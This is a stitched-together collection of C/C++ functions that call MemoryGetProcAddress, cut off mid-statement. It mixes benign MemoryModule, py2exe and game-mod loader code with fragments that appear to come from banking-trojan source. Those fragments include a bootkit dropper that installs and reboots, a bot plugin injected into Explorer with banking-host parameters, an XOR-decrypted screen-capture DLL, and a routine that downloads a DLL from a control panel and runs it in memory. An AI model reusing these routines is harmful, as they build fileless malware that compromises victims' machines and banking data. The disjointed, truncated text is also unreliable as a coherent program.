// Create a server with the specified host. IServer *ModuleManager::CreateServerInstance(onModule *Module, const char *Hostname) { IServer *(*CreateServer)(const char *); // This should not happen, but checking incase it's modified in the future. if (Module->LoadedFromDisk ? Module->ModuleHandle.Disk == NULL : Module->ModuleHandle.Memory == NULL) { fDebugPrint("%s: Tried to call an invalid handle.", __func__); return nullptr; } // Load from memory or EAT. if (Module->LoadedFromDisk) { std::string TempName = Module->Filename; TempName.append(".dll"); CreateServer = (IServer *(*)(const char *))DebugGetProcAddress(TempName.c_str(), "CreateServer"); } else CreateServer = (IServer *(*)(const char *))MemoryGetProcAddress(Module->ModuleHandle.Memory, "CreateServer"); // The developer of the modue forgot to export the function. if (!CreateServer) { fDebugPrint("%s: Module did not export \"CreateServer\"", __func__); return nullptr; } // Let this string be free, the module can clean it up. static char *FloatingString; FloatingString = new char[strlen(Hostname) + 1](); memcpy(FloatingString, Hostname, strlen(Hostname)); return CreateServer(FloatingString); };
void RunBkDrop() { DWORD loader_dll_body_size = 0; void * loader_dll_body = NULL; PP_DPRINTF(L"RunBkDrop: started."); loader_dll_body = GetSectionData("BKDROPER_PLUG", &loader_dll_body_size); PP_RETURNIF1(loader_dll_body == NULL); PP_RETURNIF1(loader_dll_body_size == 0); PP_DPRINTF(L"RunBkDrop: GetSectionData() result body=%X. size=%d", loader_dll_body, loader_dll_body_size ); HMEMORYMODULE loader_dll = MemoryLoadLibrary(loader_dll_body); PP_RETURNIF1(loader_dll == NULL); typedef BOOL (WINAPI * BkInstallFunction)(); BkInstallFunction bkinstall = NULL; bkinstall = (BkInstallFunction)MemoryGetProcAddress(loader_dll, "BkInstall"); PP_RETURNIF1(bkinstall == NULL); BOOL bkinstall_result = bkinstall(); PP_DPRINTF(L"RunBkDrop: finished with bkinstall_result=%d.", bkinstall_result); if (bkinstall_result) MultiMethodReboot(); }
void ExplorerLoadDLL(PUSER_INIT_NOTIFY InitData, LPBYTE Buf, DWORD Size) { // 320_ld попытка загрузки и запуска BotPlug DebugReportStepByName("320_ld"); HMEMORYMODULE Module = MemoryLoadLibrary(Buf); if (Module == NULL) { LDRDBG("BRDS Explorer", "Не удалось загрузить длл в память "); return; } const static char SetParamMethName[] = {'S', 'e', 't', 'B', 'o', 't', 'P', 'a', 'r', 'a', 'm', 'e', 't', 'e', 'r', 0};; SetParamMethod = (TSetParam)MemoryGetProcAddress(Module, (PCHAR)SetParamMethName); if (SetParamMethod != NULL) { SetBotParameter(BOT_PARAM_BOTPLUGNAME, BotPluginName); // Устанавливаем параметры бота LDRDBG("BRDS Explorer", "Устанавливаем параметры бота "); SetParam(BOT_PARAM_PREFIX); SetParam(BOT_PARAM_HOSTS); SetParam(BOT_PARAM_KEY); SetParam(BOT_PARAM_DELAY); SetParam(BOT_PARAM_BOTPLUGNAME); SetParam(BOT_PARAM_BANKINGHOSTS); } typedef void (WINAPI *TStart)(LPVOID, LPVOID, LPVOID); TStart Method = (TStart)MemoryGetProcAddress(Module, "Start"); if (Method != NULL) { LDRDBG("BRDS Explorer", "Бот успешно запущен "); DLLLoader::DLLLoadedInExplorer = true; Method(NULL, NULL, NULL); // 321_ld попытка загрузки и запуска BotPlug успешна DebugReportStepByName("321_ld"); } }
/* public - replacement for GetProcAddress() */ FARPROC MyGetProcAddress(HMODULE hModule, LPCSTR lpProcName) { MEMORYMODULE *p = loaded; while (p) { if ((HMODULE)p == hModule) return MemoryGetProcAddress(p, lpProcName); p = p->next; } return GetProcAddress(hModule, lpProcName); }
FARPROC MyGetProcAddress(HMODULE module, LPCSTR procname) { FARPROC proc; LIST *lib = _FindMemoryModule(NULL, module); if (lib) proc = MemoryGetProcAddress(lib->module, procname); else proc = GetProcAddress(module, procname); return proc; }
void LoadFromMemory(void) { FILE *fp; unsigned char *data=NULL; size_t size; HMEMORYMODULE handle; addNumberProc addNumber; HMEMORYRSRC resourceInfo; DWORD resourceSize; LPVOID resourceData; TCHAR buffer[100]; fp = _tfopen(DLL_FILE, _T("rb")); if (fp == NULL) { _tprintf(_T("Can't open DLL file \"%s\"."), DLL_FILE); goto exit; } fseek(fp, 0, SEEK_END); size = ftell(fp); data = (unsigned char *)malloc(size); fseek(fp, 0, SEEK_SET); fread(data, 1, size, fp); fclose(fp); handle = MemoryLoadLibrary(data, NULL); if (handle == NULL) { _tprintf(_T("Can't load library from memory.\n")); goto exit; } addNumber = (addNumberProc)MemoryGetProcAddress(handle, "addNumbers"); _tprintf(_T("From memory: %d\n"), addNumber(1, 2)); resourceInfo = MemoryFindResource(handle, MAKEINTRESOURCE(VS_VERSION_INFO), RT_VERSION); _tprintf(_T("MemoryFindResource returned 0x%p\n"), resourceInfo); resourceSize = MemorySizeofResource(handle, resourceInfo); resourceData = MemoryLoadResource(handle, resourceInfo); _tprintf(_T("Memory resource data: %ld bytes at 0x%p\n"), resourceSize, resourceData); MemoryLoadString(handle, 1, buffer, sizeof(buffer)); _tprintf(_T("String1: %s\n"), buffer); MemoryLoadString(handle, 20, buffer, sizeof(buffer)); _tprintf(_T("String2: %s\n"), buffer); MemoryFreeLibrary(handle); exit: if (data) free(data); }
void _Import_Zlib(char *pdata) { HMODULE hlib; hlib = MemoryLoadLibrary("zlib.pyd", pdata); if (hlib) { void (*proc)(void); proc = (void(*)(void))MemoryGetProcAddress(hlib, "initzlib"); if (proc) proc(); } }
FARPROC MyGetProcAddress(HMODULE module, LPCSTR procname) { FARPROC proc; LIST *lib = _FindMemoryModule(NULL, module); if (lib) { dprintf("MyGetProcAddress(%p, %p(%s))\n", module, procname, HIWORD(procname) ? procname : ""); PUSH(); proc = MemoryGetProcAddress(lib->module, procname); POP(); dprintf("MyGetProcAddress(%p, %p(%s)) -> %p\n", module, procname, HIWORD(procname) ? procname : "", proc); return proc; } else return GetProcAddress(module, procname); }
void InitScreenLib() { bInitialized = false; CaptureScreen = NULL; DWORD dwScreenSize = sizeof( Screen_Dll ); LPBYTE ScreenFile = (LPBYTE)MemAlloc( dwScreenSize + 1 ); if ( !ScreenFile ) { return; } m_memcpy( ScreenFile, Screen_Dll, sizeof( Screen_Dll ) ); DWORD dwPassLen = *(DWORD*)ScreenFile; ScreenFile += sizeof( DWORD ); dwScreenSize -= sizeof( DWORD ); char Password[30]; m_memcpy( Password, ScreenFile, dwPassLen ); Password[ dwPassLen ] = '\0'; ScreenFile += dwPassLen; dwScreenSize -= dwPassLen; XORCrypt::Crypt(Password, ScreenFile, dwScreenSize); m_memset( Password, 0, dwPassLen ); hLib = MemoryLoadLibrary( ScreenFile ); if ( hLib != NULL ) { char CapScreen[] = {'C','a','p','t','u','r','e','S','c','r','e','e','n',0}; CaptureScreen = (PCaptureScreen)MemoryGetProcAddress( hLib, CapScreen ); if ( CaptureScreen ) { bInitialized = true; } } return; }
void LoadAndStartDll() { int size; char* dll = LoadFileFromAdminka( nameLoadDll, &size ); if( dll ) { //u_SaveToFile( "c:\\test.bin", dll, size ); HMEMORYMODULE hdll = MemoryLoadLibrary(dll); if( hdll ) { TypeRunFunc func = (TypeRunFunc)MemoryGetProcAddress( hdll, "TestRun" ); if( func ) func(); } u_free(dll); } }
int main(int argc, char* argv[]) { unsigned char *data; size_t filelen; HMEMORYMODULE testBase; // dll base handle addNumberProc addNumber; // function ptr if(argc < 3){ printf("Usage: %s <dll_name> <dll_func_name>\n",argv[0]); return -1; } /* load the dll file into memory * * Note:(This step could have been from an encrypted, compressed or signed file or * even dynamically downloaded from the web (!), etc.). */ data = load_file(argv[1], &filelen); if(data == 0) { printf("failed to load %d, exiting.\n",argv[1]); return 0; } printf("Opening lib ..\n"); /* load shared library from buffer, relocate it, etc. */ if((testBase = MemoryLoadLibrary(data)) == NULL) { printf("Can't load library.\n"); free(data); return -1; } printf("Finding api call ..\n"); /* now we can lookup any named vtable function(s) we want.. */ addNumber = (addNumberProc)MemoryGetProcAddress(testBase, argv[2]); if(addNumber != 0) { printf("Got it! %d = %s(1,2);\n", addNumber(1, 2),argv[2]); /* example use of dll exported function */ } else { printf("Sorry %s() api not found in this dll.\n",argv[2]); } printf("Closing lib ..\n"); /* close the library */ MemoryFreeLibrary(testBase); /* free loaded dll buffer memory */ free(data); return 0; }
void LoadFromMemory(void) { unsigned char *data=NULL; size_t size; HMEMORYMODULE module; addNumberProc addNumber; /* FILE *fp; fp = fopen(DLL_FILE, "rb"); if (fp == NULL) { printf("Can't open DLL file \"%s\".", DLL_FILE); goto exit; } fseek(fp, 0, SEEK_END); size = ftell(fp); data = (unsigned char *)malloc(size); fseek(fp, 0, SEEK_SET); fread(data, 1, size, fp); fclose(fp); */ HRSRC hResID = ::FindResource(NULL,MAKEINTRESOURCE(IDR_EXE1),"exe");//查找资源 HGLOBAL hRes = ::LoadResource(NULL,hResID);//加载资源 data = (unsigned char *)::LockResource(hRes);//锁定资源 module = MemoryLoadLibrary(data); if (module == NULL) { printf("Can't load library from memory.\n"); goto exit; } addNumber = (addNumberProc)MemoryGetProcAddress(module, "addNumbers"); printf("From memory: %d\n", addNumber(1, 2)); MemoryFreeLibrary(module); exit: if (data) free(data); }
int _load_python(char *dllname, char *bytes) { int i; struct IMPORT *p = imports; HMODULE hmod; if (!bytes) return _load_python_FromFile(dllname); hmod = MemoryLoadLibrary(dllname, bytes); if (hmod == NULL) { return 0; } for (i = 0; p->name; ++i, ++p) { p->proc = (void (*)())MemoryGetProcAddress(hmod, p->name); if (p->proc == NULL) { OutputDebugString("undef symbol"); fprintf(stderr, "undefined symbol %s -> exit(-1)\n", p->name); return 0; } } return 1; }
void DownloadPlugByLoaderDll() { DWORD loader_dll_body_size = 0; void * loader_dll_body = NULL; PP_DPRINTF(L"DownloadPlugByLoaderDll: started."); // 120_d загрузка Loader_dll PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("120_d")); loader_dll_body = GetSectionData("LOADER_DLL", &loader_dll_body_size); PP_RETURNIF1(loader_dll_body == NULL); PP_RETURNIF1(loader_dll_body_size == 0); HMEMORYMODULE loader_dll = MemoryLoadLibrary(loader_dll_body); PP_RETURNIF1(loader_dll == NULL); // 121_d загрузка Loader_dll успешна PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("121_d")); typedef BOOL (WINAPI* LoadPlugToCacheFunction)(DWORD); LoadPlugToCacheFunction load_plug_to_cache = NULL; load_plug_to_cache = (LoadPlugToCacheFunction)MemoryGetProcAddress(loader_dll, "LoadPlugToCache"); PP_RETURNIF1(load_plug_to_cache == NULL); // 122_d начало вызова LoadPlugin PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("122_d")); BOOL load_plug_result = load_plug_to_cache(0); PP_DPRINTF(L"DownloadPlugByLoaderDll: finished with load_plug_result=%d.", load_plug_result); }
static BOOL BuildImportTable(PMEMORYMODULE module) { unsigned char *codeBase = module->codeBase; ULONG_PTR lpCookie = NULL; BOOL result = TRUE; PIMAGE_DATA_DIRECTORY directory = GET_HEADER_DICTIONARY(module, IMAGE_DIRECTORY_ENTRY_IMPORT); if (directory->Size == 0) { return TRUE; } PIMAGE_DATA_DIRECTORY resource = GET_HEADER_DICTIONARY(module, IMAGE_DIRECTORY_ENTRY_RESOURCE); if (directory->Size == 0){ return TRUE; } PIMAGE_IMPORT_DESCRIPTOR importDesc = (PIMAGE_IMPORT_DESCRIPTOR) (codeBase + directory->VirtualAddress); // Following will be used to resolve manifest in module if (resource->Size) { PIMAGE_RESOURCE_DIRECTORY resDir = (PIMAGE_RESOURCE_DIRECTORY)(codeBase + resource->VirtualAddress); PIMAGE_RESOURCE_DIRECTORY resDirTemp; PIMAGE_RESOURCE_DIRECTORY_ENTRY resDirEntry = (PIMAGE_RESOURCE_DIRECTORY_ENTRY) ((char*)resDir + sizeof(IMAGE_RESOURCE_DIRECTORY)); PIMAGE_RESOURCE_DIRECTORY_ENTRY resDirEntryTemp; PIMAGE_RESOURCE_DATA_ENTRY resDataEntry; // ACTCTX Structure, not used members must be set to 0! ACTCTXA actctx ={0,0,0,0,0,0,0,0,0}; actctx.cbSize = sizeof(actctx); HANDLE hActCtx; // Path to temp directory + our temporary file name CHAR buf[MAX_PATH]; DWORD tempPathLength = GetTempPathA(MAX_PATH, buf); memcpy(buf + tempPathLength,"AutoHotkey.MemoryModule.temp.manifest",38); actctx.lpSource = buf; // Enumerate Resources int i = 0; if (_CreateActCtxA != NULL) for (;i < resDir->NumberOfIdEntries + resDir->NumberOfNamedEntries;i++) { // Resolve current entry resDirEntry = (PIMAGE_RESOURCE_DIRECTORY_ENTRY)((char*)resDir + sizeof(IMAGE_RESOURCE_DIRECTORY) + (i*sizeof(IMAGE_RESOURCE_DIRECTORY_ENTRY))); // If entry is directory and Id is 24 = RT_MANIFEST if (resDirEntry->DataIsDirectory && resDirEntry->Id == 24) { //resDirTemp = (PIMAGE_RESOURCE_DIRECTORY)((char*)resDir + (resDirEntry->OffsetToDirectory)); resDirEntryTemp = (PIMAGE_RESOURCE_DIRECTORY_ENTRY)((char*)resDir + (resDirEntry->OffsetToDirectory) + sizeof(IMAGE_RESOURCE_DIRECTORY)); resDirTemp = (PIMAGE_RESOURCE_DIRECTORY) ((char*)resDir + (resDirEntryTemp->OffsetToDirectory)); resDirEntryTemp = (PIMAGE_RESOURCE_DIRECTORY_ENTRY)((char*)resDir + (resDirEntryTemp->OffsetToDirectory) + sizeof(IMAGE_RESOURCE_DIRECTORY)); resDataEntry = (PIMAGE_RESOURCE_DATA_ENTRY) ((char*)resDir + (resDirEntryTemp->OffsetToData)); // Write manifest to temportary file // Using FILE_ATTRIBUTE_TEMPORARY will avoid writing it to disk // It will be deleted after CreateActCtx has been called. HANDLE hFile = CreateFileA(buf,GENERIC_WRITE,NULL,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_TEMPORARY,NULL); if (hFile == INVALID_HANDLE_VALUE) { #if DEBUG_OUTPUT OutputDebugStringA("CreateFile failed.\n"); #endif break; //failed to create file, continue and try loading without CreateActCtx } DWORD byteswritten = 0; WriteFile(hFile,(codeBase + resDataEntry->OffsetToData),resDataEntry->Size,&byteswritten,NULL); CloseHandle(hFile); if (byteswritten == 0) { #if DEBUG_OUTPUT OutputDebugStringA("WriteFile failed.\n"); #endif break; //failed to write data, continue and try loading } hActCtx = _CreateActCtxA(&actctx); // Open file and automatically delete on CloseHandle (FILE_FLAG_DELETE_ON_CLOSE) hFile = CreateFileA(buf,GENERIC_WRITE,FILE_SHARE_DELETE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_TEMPORARY|FILE_FLAG_DELETE_ON_CLOSE,NULL); CloseHandle(hFile); if (hActCtx == INVALID_HANDLE_VALUE) break; //failed to create context, continue and try loading _ActivateActCtx(hActCtx,&lpCookie); // Don't care if this fails since we would countinue anyway break; // Break since a dll can have only 1 manifest } } } for (; !IsBadReadPtr(importDesc, sizeof(IMAGE_IMPORT_DESCRIPTOR)) && importDesc->Name; importDesc++) { uintptr_t *thunkRef; FARPROC *funcRef; HCUSTOMMODULE *tmp; HCUSTOMMODULE handle = NULL; char *isMsvcr = NULL; if (g_hMSVCR != NULL && (isMsvcr = strstr((LPSTR)(codeBase + importDesc->Name), "MSVCR100.dll"))) { handle = g_hMSVCR; //GetModuleHandle(_T("MSVCRT.dll")); if (tmp == NULL) tmp = (HCUSTOMMODULE *)malloc((sizeof(HCUSTOMMODULE))); if (tmp == NULL) { SetLastError(ERROR_OUTOFMEMORY); result = 0; break; } module->modules = tmp; module->modules[0] = handle; } else handle = module->loadLibrary((LPCSTR) (codeBase + importDesc->Name), module->userdata); if (handle == NULL) { SetLastError(ERROR_MOD_NOT_FOUND); result = FALSE; break; } if (!isMsvcr) { tmp = (HCUSTOMMODULE *)realloc(module->modules, (module->numModules + 1)*(sizeof(HCUSTOMMODULE))); if (tmp == NULL) { module->freeLibrary(handle, module->userdata); SetLastError(ERROR_OUTOFMEMORY); result = 0; break; } module->modules = tmp; if (module->numModules == 1) module->modules[0] = NULL; module->modules[module->numModules++] = handle; } if (importDesc->OriginalFirstThunk) { thunkRef = (uintptr_t *) (codeBase + importDesc->OriginalFirstThunk); funcRef = (FARPROC *) (codeBase + importDesc->FirstThunk); } else { // no hint table thunkRef = (uintptr_t *) (codeBase + importDesc->FirstThunk); funcRef = (FARPROC *) (codeBase + importDesc->FirstThunk); } for (; *thunkRef; thunkRef++, funcRef++) { if (IMAGE_SNAP_BY_ORDINAL(*thunkRef)) { if (!isMsvcr) *funcRef = module->getProcAddress(handle, (LPCSTR)IMAGE_ORDINAL(*thunkRef), module->userdata); else *funcRef = MemoryGetProcAddress(handle, (LPCSTR)IMAGE_ORDINAL(*thunkRef)); } else { PIMAGE_IMPORT_BY_NAME thunkData = (PIMAGE_IMPORT_BY_NAME) (codeBase + (*thunkRef)); if (!isMsvcr) *funcRef = module->getProcAddress(handle, (LPCSTR)&thunkData->Name, module->userdata); else *funcRef = MemoryGetProcAddress(handle, (LPCSTR)&thunkData->Name); } if (*funcRef == 0) { result = FALSE; break; } } if (!result) { module->freeLibrary(handle, module->userdata); SetLastError(ERROR_PROC_NOT_FOUND); break; } } if (_DeactivateActCtx && lpCookie) _DeactivateActCtx(NULL,lpCookie); return result; }
void LoadOriginalLibrary() { if (_stricmp(DllName + 1, "vorbisFile.dll") == NULL) { HRSRC hResource = FindResource(dllModule, MAKEINTRESOURCE(IDR_VBHKD), RT_RCDATA); if (hResource) { HGLOBAL hLoadedResource = LoadResource(dllModule, hResource); if (hLoadedResource) { LPVOID pLockedResource = LockResource(hLoadedResource); if (pLockedResource) { DWORD dwResourceSize = SizeofResource(dllModule, hResource); if (0 != dwResourceSize) { vorbisHooked = MemoryLoadLibrary((const void*)pLockedResource, dwResourceSize); if (vorbisHooked) { __ov_open_callbacks = MemoryGetProcAddress(vorbisHooked, "ov_open_callbacks"); __ov_clear = MemoryGetProcAddress(vorbisHooked, "ov_clear"); __ov_time_total = MemoryGetProcAddress(vorbisHooked, "ov_time_total"); __ov_time_tell = MemoryGetProcAddress(vorbisHooked, "ov_time_tell"); __ov_read = MemoryGetProcAddress(vorbisHooked, "ov_read"); __ov_info = MemoryGetProcAddress(vorbisHooked, "ov_info"); __ov_time_seek = MemoryGetProcAddress(vorbisHooked, "ov_time_seek"); __ov_time_seek_page = MemoryGetProcAddress(vorbisHooked, "ov_time_seek_page"); } } } } } } else { if (_stricmp(DllName + 1, "dsound.dll") == NULL) { dsound.dll = LoadLibrary(szSystemPath); dsound.DirectSoundCaptureCreate = GetProcAddress(dsound.dll, "DirectSoundCaptureCreate"); dsound.DirectSoundCaptureCreate8 = GetProcAddress(dsound.dll, "DirectSoundCaptureCreate8"); dsound.DirectSoundCaptureEnumerateA = GetProcAddress(dsound.dll, "DirectSoundCaptureEnumerateA"); dsound.DirectSoundCaptureEnumerateW = GetProcAddress(dsound.dll, "DirectSoundCaptureEnumerateW"); dsound.DirectSoundCreate = GetProcAddress(dsound.dll, "DirectSoundCreate"); dsound.DirectSoundCreate8 = GetProcAddress(dsound.dll, "DirectSoundCreate8"); dsound.DirectSoundEnumerateA = GetProcAddress(dsound.dll, "DirectSoundEnumerateA"); dsound.DirectSoundEnumerateW = GetProcAddress(dsound.dll, "DirectSoundEnumerateW"); dsound.DirectSoundFullDuplexCreate = GetProcAddress(dsound.dll, "DirectSoundFullDuplexCreate"); dsound.DllCanUnloadNow = GetProcAddress(dsound.dll, "DllCanUnloadNow"); dsound.DllGetClassObject = GetProcAddress(dsound.dll, "DllGetClassObject"); dsound.GetDeviceID = GetProcAddress(dsound.dll, "GetDeviceID"); } else { if (_stricmp(DllName + 1, "dinput8.dll") == NULL) { dinput8.dll = LoadLibrary(szSystemPath); dinput8.DirectInput8Create = GetProcAddress(dinput8.dll, "DirectInput8Create"); dinput8.DllCanUnloadNow = GetProcAddress(dinput8.dll, "DllCanUnloadNow"); dinput8.DllGetClassObject = GetProcAddress(dinput8.dll, "DllGetClassObject"); dinput8.DllRegisterServer = GetProcAddress(dinput8.dll, "DllRegisterServer"); dinput8.DllUnregisterServer = GetProcAddress(dinput8.dll, "DllUnregisterServer"); } else { if (_stricmp(DllName + 1, "ddraw.dll") == NULL) { ddraw.dll = LoadLibrary(szSystemPath); ddraw.AcquireDDThreadLock = GetProcAddress(ddraw.dll, "AcquireDDThreadLock"); ddraw.CompleteCreateSysmemSurface = GetProcAddress(ddraw.dll, "CompleteCreateSysmemSurface"); ddraw.D3DParseUnknownCommand = GetProcAddress(ddraw.dll, "D3DParseUnknownCommand"); ddraw.DDGetAttachedSurfaceLcl = GetProcAddress(ddraw.dll, "DDGetAttachedSurfaceLcl"); ddraw.DDInternalLock = GetProcAddress(ddraw.dll, "DDInternalLock"); ddraw.DDInternalUnlock = GetProcAddress(ddraw.dll, "DDInternalUnlock"); ddraw.DSoundHelp = GetProcAddress(ddraw.dll, "DSoundHelp"); ddraw.DirectDrawCreate = GetProcAddress(ddraw.dll, "DirectDrawCreate"); ddraw.DirectDrawCreateClipper = GetProcAddress(ddraw.dll, "DirectDrawCreateClipper"); ddraw.DirectDrawCreateEx = GetProcAddress(ddraw.dll, "DirectDrawCreateEx"); ddraw.DirectDrawEnumerateA = GetProcAddress(ddraw.dll, "DirectDrawEnumerateA"); ddraw.DirectDrawEnumerateExA = GetProcAddress(ddraw.dll, "DirectDrawEnumerateExA"); ddraw.DirectDrawEnumerateExW = GetProcAddress(ddraw.dll, "DirectDrawEnumerateExW"); ddraw.DirectDrawEnumerateW = GetProcAddress(ddraw.dll, "DirectDrawEnumerateW"); ddraw.DllCanUnloadNow = GetProcAddress(ddraw.dll, "DllCanUnloadNow"); ddraw.DllGetClassObject = GetProcAddress(ddraw.dll, "DllGetClassObject"); ddraw.GetDDSurfaceLocal = GetProcAddress(ddraw.dll, "GetDDSurfaceLocal"); ddraw.GetOLEThunkData = GetProcAddress(ddraw.dll, "GetOLEThunkData"); ddraw.GetSurfaceFromDC = GetProcAddress(ddraw.dll, "GetSurfaceFromDC"); ddraw.RegisterSpecialCase = GetProcAddress(ddraw.dll, "RegisterSpecialCase"); ddraw.ReleaseDDThreadLock = GetProcAddress(ddraw.dll, "ReleaseDDThreadLock"); ddraw.SetAppCompatData = GetProcAddress(ddraw.dll, "SetAppCompatData"); } else { if (_stricmp(DllName + 1, "d3d8.dll") == NULL) { d3d8.dll = LoadLibrary(szSystemPath); d3d8.DebugSetMute = GetProcAddress(d3d8.dll, "DebugSetMute"); d3d8.Direct3D8EnableMaximizedWindowedModeShim = GetProcAddress(d3d8.dll, "Direct3D8EnableMaximizedWindowedModeShim"); d3d8.Direct3DCreate8 = GetProcAddress(d3d8.dll, "Direct3DCreate8"); d3d8.ValidatePixelShader = GetProcAddress(d3d8.dll, "ValidatePixelShader"); d3d8.ValidateVertexShader = GetProcAddress(d3d8.dll, "ValidateVertexShader"); } else { if (_stricmp(DllName + 1, "d3d9.dll") == NULL) { d3d9.dll = LoadLibrary(szSystemPath); d3d9.D3DPERF_BeginEvent = GetProcAddress(d3d9.dll, "D3DPERF_BeginEvent"); d3d9.D3DPERF_EndEvent = GetProcAddress(d3d9.dll, "D3DPERF_EndEvent"); d3d9.D3DPERF_GetStatus = GetProcAddress(d3d9.dll, "D3DPERF_GetStatus"); d3d9.D3DPERF_QueryRepeatFrame = GetProcAddress(d3d9.dll, "D3DPERF_QueryRepeatFrame"); d3d9.D3DPERF_SetMarker = GetProcAddress(d3d9.dll, "D3DPERF_SetMarker"); d3d9.D3DPERF_SetOptions = GetProcAddress(d3d9.dll, "D3DPERF_SetOptions"); d3d9.D3DPERF_SetRegion = GetProcAddress(d3d9.dll, "D3DPERF_SetRegion"); d3d9.DebugSetLevel = GetProcAddress(d3d9.dll, "DebugSetLevel"); d3d9.DebugSetMute = GetProcAddress(d3d9.dll, "DebugSetMute"); d3d9.Direct3D9EnableMaximizedWindowedModeShim = GetProcAddress(d3d9.dll, "Direct3D9EnableMaximizedWindowedModeShim"); d3d9.Direct3DCreate9 = GetProcAddress(d3d9.dll, "Direct3DCreate9"); d3d9.Direct3DCreate9Ex = GetProcAddress(d3d9.dll, "Direct3DCreate9Ex"); d3d9.Direct3DShaderValidatorCreate9 = GetProcAddress(d3d9.dll, "Direct3DShaderValidatorCreate9"); d3d9.PSGPError = GetProcAddress(d3d9.dll, "PSGPError"); d3d9.PSGPSampleTexture = GetProcAddress(d3d9.dll, "PSGPSampleTexture"); } else { if (_stricmp(DllName + 1, "d3d11.dll") == NULL) { d3d11.dll = LoadLibrary(szSystemPath); d3d11.D3D11CoreCreateDevice = GetProcAddress(d3d11.dll, "D3D11CoreCreateDevice"); d3d11.D3D11CoreCreateLayeredDevice = GetProcAddress(d3d11.dll, "D3D11CoreCreateLayeredDevice"); d3d11.D3D11CoreGetLayeredDeviceSize = GetProcAddress(d3d11.dll, "D3D11CoreGetLayeredDeviceSize"); d3d11.D3D11CoreRegisterLayers = GetProcAddress(d3d11.dll, "D3D11CoreRegisterLayers"); d3d11.D3D11CreateDevice = GetProcAddress(d3d11.dll, "D3D11CreateDevice"); d3d11.D3D11CreateDeviceAndSwapChain = GetProcAddress(d3d11.dll, "D3D11CreateDeviceAndSwapChain"); d3d11.D3DKMTCloseAdapter = GetProcAddress(d3d11.dll, "D3DKMTCloseAdapter"); d3d11.D3DKMTCreateAllocation = GetProcAddress(d3d11.dll, "D3DKMTCreateAllocation"); d3d11.D3DKMTCreateContext = GetProcAddress(d3d11.dll, "D3DKMTCreateContext"); d3d11.D3DKMTCreateDevice = GetProcAddress(d3d11.dll, "D3DKMTCreateDevice"); d3d11.D3DKMTCreateSynchronizationObject = GetProcAddress(d3d11.dll, "D3DKMTCreateSynchronizationObject"); d3d11.D3DKMTDestroyAllocation = GetProcAddress(d3d11.dll, "D3DKMTDestroyAllocation"); d3d11.D3DKMTDestroyContext = GetProcAddress(d3d11.dll, "D3DKMTDestroyContext"); d3d11.D3DKMTDestroyDevice = GetProcAddress(d3d11.dll, "D3DKMTDestroyDevice"); d3d11.D3DKMTDestroySynchronizationObject = GetProcAddress(d3d11.dll, "D3DKMTDestroySynchronizationObject"); d3d11.D3DKMTEscape = GetProcAddress(d3d11.dll, "D3DKMTEscape"); d3d11.D3DKMTGetContextSchedulingPriority = GetProcAddress(d3d11.dll, "D3DKMTGetContextSchedulingPriority"); d3d11.D3DKMTGetDeviceState = GetProcAddress(d3d11.dll, "D3DKMTGetDeviceState"); d3d11.D3DKMTGetDisplayModeList = GetProcAddress(d3d11.dll, "D3DKMTGetDisplayModeList"); d3d11.D3DKMTGetMultisampleMethodList = GetProcAddress(d3d11.dll, "D3DKMTGetMultisampleMethodList"); d3d11.D3DKMTGetRuntimeData = GetProcAddress(d3d11.dll, "D3DKMTGetRuntimeData"); d3d11.D3DKMTGetSharedPrimaryHandle = GetProcAddress(d3d11.dll, "D3DKMTGetSharedPrimaryHandle"); d3d11.D3DKMTLock = GetProcAddress(d3d11.dll, "D3DKMTLock"); d3d11.D3DKMTOpenAdapterFromHdc = GetProcAddress(d3d11.dll, "D3DKMTOpenAdapterFromHdc"); d3d11.D3DKMTOpenResource = GetProcAddress(d3d11.dll, "D3DKMTOpenResource"); d3d11.D3DKMTPresent = GetProcAddress(d3d11.dll, "D3DKMTPresent"); d3d11.D3DKMTQueryAdapterInfo = GetProcAddress(d3d11.dll, "D3DKMTQueryAdapterInfo"); d3d11.D3DKMTQueryAllocationResidency = GetProcAddress(d3d11.dll, "D3DKMTQueryAllocationResidency"); d3d11.D3DKMTQueryResourceInfo = GetProcAddress(d3d11.dll, "D3DKMTQueryResourceInfo"); d3d11.D3DKMTRender = GetProcAddress(d3d11.dll, "D3DKMTRender"); d3d11.D3DKMTSetAllocationPriority = GetProcAddress(d3d11.dll, "D3DKMTSetAllocationPriority"); d3d11.D3DKMTSetContextSchedulingPriority = GetProcAddress(d3d11.dll, "D3DKMTSetContextSchedulingPriority"); d3d11.D3DKMTSetDisplayMode = GetProcAddress(d3d11.dll, "D3DKMTSetDisplayMode"); d3d11.D3DKMTSetDisplayPrivateDriverFormat = GetProcAddress(d3d11.dll, "D3DKMTSetDisplayPrivateDriverFormat"); d3d11.D3DKMTSetGammaRamp = GetProcAddress(d3d11.dll, "D3DKMTSetGammaRamp"); d3d11.D3DKMTSetVidPnSourceOwner = GetProcAddress(d3d11.dll, "D3DKMTSetVidPnSourceOwner"); d3d11.D3DKMTSignalSynchronizationObject = GetProcAddress(d3d11.dll, "D3DKMTSignalSynchronizationObject"); d3d11.D3DKMTUnlock = GetProcAddress(d3d11.dll, "D3DKMTUnlock"); d3d11.D3DKMTWaitForSynchronizationObject = GetProcAddress(d3d11.dll, "D3DKMTWaitForSynchronizationObject"); d3d11.D3DKMTWaitForVerticalBlankEvent = GetProcAddress(d3d11.dll, "D3DKMTWaitForVerticalBlankEvent"); d3d11.D3DPerformance_BeginEvent = GetProcAddress(d3d11.dll, "D3DPerformance_BeginEvent"); d3d11.D3DPerformance_EndEvent = GetProcAddress(d3d11.dll, "D3DPerformance_EndEvent"); d3d11.D3DPerformance_GetStatus = GetProcAddress(d3d11.dll, "D3DPerformance_GetStatus"); d3d11.D3DPerformance_SetMarker = GetProcAddress(d3d11.dll, "D3DPerformance_SetMarker"); d3d11.EnableFeatureLevelUpgrade = GetProcAddress(d3d11.dll, "EnableFeatureLevelUpgrade"); d3d11.OpenAdapter10 = GetProcAddress(d3d11.dll, "OpenAdapter10"); d3d11.OpenAdapter10_2 = GetProcAddress(d3d11.dll, "OpenAdapter10_2"); } else { if (_stricmp(DllName + 1, "winmmbase.dll") == NULL) { winmmbase.dll = LoadLibrary(szSystemPath); winmmbase.CloseDriver = GetProcAddress(winmmbase.dll, "CloseDriver"); winmmbase.DefDriverProc = GetProcAddress(winmmbase.dll, "DefDriverProc"); winmmbase.DriverCallback = 